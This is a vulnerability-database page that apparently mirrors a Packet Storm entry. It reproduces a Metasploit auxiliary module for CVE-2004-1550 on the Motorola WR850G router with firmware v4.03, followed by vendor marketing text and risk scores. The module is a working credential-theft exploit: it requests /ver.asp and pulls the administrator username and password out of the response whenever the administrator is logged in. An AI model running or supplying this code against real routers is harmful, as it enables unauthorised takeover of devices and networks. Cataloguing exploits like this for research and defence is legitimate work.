Lucene search
K

Motorola WR850G 4.03 Credentials

🗓️ 31 Aug 2024 00:00:00Reported by Kris Katterjohn, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 149 Views

Obtain Motorola WR850G v4.03 router credentials via simple GET request

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2004-1550
29 May 201815:50
circl
CVE
CVE-2004-1550
20 Feb 200505:00
cve
Cvelist
CVE-2004-1550
20 Feb 200505:00
cvelist
Metasploit
Motorola WR850G v4.03 Credentials
6 Oct 200813:16
metasploit
NVD
CVE-2004-1550
31 Dec 200405:00
nvd
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Motorola WR850G v4.03 Credentials',  
'Description' => %q{  
Login credentials to the Motorola WR850G router with  
firmware v4.03 can be obtained via a simple GET request  
if issued while the administrator is logged in. A lot  
more information is available through this request, but  
you can get it all and more after logging in.  
},  
'Author' => 'kris katterjohn',  
'License' => MSF_LICENSE,  
'References' => [  
[ 'CVE', '2004-1550' ],  
[ 'OSVDB', '10232' ],  
[ 'URL', 'https://seclists.org/bugtraq/2004/Sep/0339.html'],  
],  
'DisclosureDate' => '2004-09-24'))  
  
register_options([  
Opt::RPORT(80)  
])  
end  
  
def run  
connect  
  
sock.put("GET /ver.asp HTTP/1.0\r\n\r\n")  
response = sock.get_once  
  
disconnect  
  
if response.nil? or response.empty?  
print_status("No response from server")  
return  
end  
  
# 302 Redirect  
if response.split(/\r\n/)[0] !~ /200 Ok/  
print_status("Administrator not logged in")  
return  
end  
  
user = $1 if response.match("http_username=([^\n]*)<br>")  
pass = $1 if response.match("http_passwd=([^\n]*)<br>")  
  
print_status("Found username \"#{user}\" and password \"#{pass}\"") if user and pass  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2024 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 27.5
EPSS0.35484
149